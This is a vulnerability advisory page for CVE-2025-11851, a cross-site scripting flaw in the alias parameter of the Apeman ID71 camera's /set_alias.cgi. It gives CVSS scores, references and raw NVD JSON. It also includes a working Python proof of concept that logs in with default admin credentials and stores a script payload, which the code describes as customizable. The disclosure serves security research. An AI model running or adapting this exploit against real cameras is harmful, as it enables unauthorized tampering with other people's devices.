CVE-2025-11851

Description

A vulnerability has been found in Apeman ID71 EN75.8.53.20. The affected element is an unknown function of the file /set_alias.cgi. Such manipulation of the argument alias leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Apeman ID71 固件版本 EN75.8.53.20

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-11851 - Apeman ID71 XSS PoC
Vulnerability: Reflected/Stored XSS in /set_alias.cgi via 'alias' parameter
Target: Apeman ID71 Camera firmware EN75.8.53.20
"""

import requests
import sys
from urllib.parse import quote

TARGET_HOST = "http://<target_ip>"
USERNAME = "admin"
PASSWORD = "admin"

# XSS payload - can be customized for different attack scenarios
XSS_PAYLOAD = '<script>alert("XSS-CVE-2025-11851")</script>'

def exploit(target_host, username, password, payload):
    session = requests.Session()

    # Step 1: Authenticate to the camera web interface
    login_url = f"{target_host}/login.cgi"
    login_data = {
        "username": username,
        "password": password
    }

    print(f"[*] Authenticating to {target_host}...")
    resp = session.post(login_url, data=login_data, verify=False)

    if resp.status_code != 200:
        print(f"[-] Authentication failed with status code: {resp.status_code}")
        return False

    print("[+] Authentication successful")

    # Step 2: Inject XSS payload via alias parameter
    set_alias_url = f"{target_host}/set_alias.cgi"
    alias_data = {
        "alias": payload
    }

    print(f"[*] Injecting XSS payload into alias parameter...")
    print(f"[*] Payload: {payload}")
    resp = session.post(set_alias_url, data=alias_data, verify=False)

    if resp.status_code == 200:
        print("[+] XSS payload successfully injected!")
        print(f"[*] When an admin views the device page, the script will execute.")
        return True
    else:
        print(f"[-] Failed to inject payload. Status code: {resp.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) >= 2:
        TARGET_HOST = sys.argv[1]
    if len(sys.argv) >= 3:
        USERNAME = sys.argv[2]
    if len(sys.argv) >= 4:
        PASSWORD = sys.argv[3]

    print("=" * 60)
    print("CVE-2025-11851 - Apeman ID71 XSS Exploit")
    print("=" * 60)

    exploit(TARGET_HOST, USERNAME, PASSWORD, XSS_PAYLOAD)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11851
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11851
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11851/
[4] VulDB https://vuldb.com/cve/CVE-2025-11851
[5] https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
[6] https://vuldb.com/?ctiid.328797
[7] https://vuldb.com/?id.328797
[8] https://vuldb.com/?submit.668771

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11851", "sourceIdentifier": "[email protected]", "published": "2025-10-16T16:15:37.453", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Apeman ID71 EN75.8.53.20. The affected element is an unknown function of the file /set_alias.cgi. Such manipulation of the argument alias leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.328797", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.328797", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.668771", "source": "[email protected]"}]}}